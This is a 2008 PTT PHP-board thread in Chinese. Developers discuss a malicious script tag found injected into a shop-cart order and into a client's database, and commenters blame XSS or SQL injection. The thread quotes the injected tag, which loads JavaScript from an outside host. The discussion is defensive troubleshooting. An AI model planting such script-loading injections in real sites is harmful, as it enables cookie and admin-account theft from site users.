Re: [請益] 我的客戶被詐騙集團打電話了..

看板PHP作者 (夏天到了,冷不起來了說)時間17年前 (2008/06/06 21:33), 編輯推噓3(307)
留言10則, 5人參與, 最新討論串2/4 (看更多)
※ 引述《reflynet ()》之銘言: : 首先可能要先說明一下,我有個購物車是用ecshop的. : 前幾天有一筆訂單的內文出現了<script src="" rel="nofollow">http://i69s.cn/c.js"></script> : 當下不以為意,就把那一筆訂單刪掉了.. ==恕刪== 看到這我想到前陣子幫客戶做系統轉移的程式改寫時 (ASP -> PHP) 發現客戶的資料庫被入侵修改, 一堆資料都被加了一堆類似上面的Script 另一個聽到案例也是用ASP 不知道是不是IIS有漏洞的關係 不知道您的購物車是用何種程式呢? -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 118.160.142.121

06/06 21:34, , 1F
這種XSS攻擊應該和ISS關係不大,是購物車程式的問題吧
06/06 21:34, 1F

06/06 22:29, , 2F
因為我遇到的情形是整個資料庫都被加料
06/06 22:29, 2F

06/06 22:30, , 3F
XSS攻擊應該比較難弄到整個資料庫..
06/06 22:30, 3F

06/06 22:47, , 4F
應該是搭配了一些AJAX上的漏洞的關係...
06/06 22:47, 4F

06/06 23:05, , 5F
這是程式在收來自使用者資料的時候沒有過濾完整..
06/06 23:05, 5F

06/06 23:06, , 6F
不管是c, perl, asp, cfm, php, aspx 都有可能發生..
06/06 23:06, 6F

06/06 23:18, , 7F
這類型的攻擊大多是偷得使用者Cookie的資料
06/06 23:18, 7F

06/06 23:19, , 8F
畢竟Ajax有跨網域限制,偷帳號密碼容易多了
06/06 23:19, 8F

06/06 23:19, , 9F
尤其拿到管理員帳號權限=無所不能...
06/06 23:19, 9F

06/07 01:30, , 10F
sql injection也有可能
06/07 01:30, 10F
文章代碼(AID): #18IJoReh (PHP)
文章代碼(AID): #18IJoReh (PHP)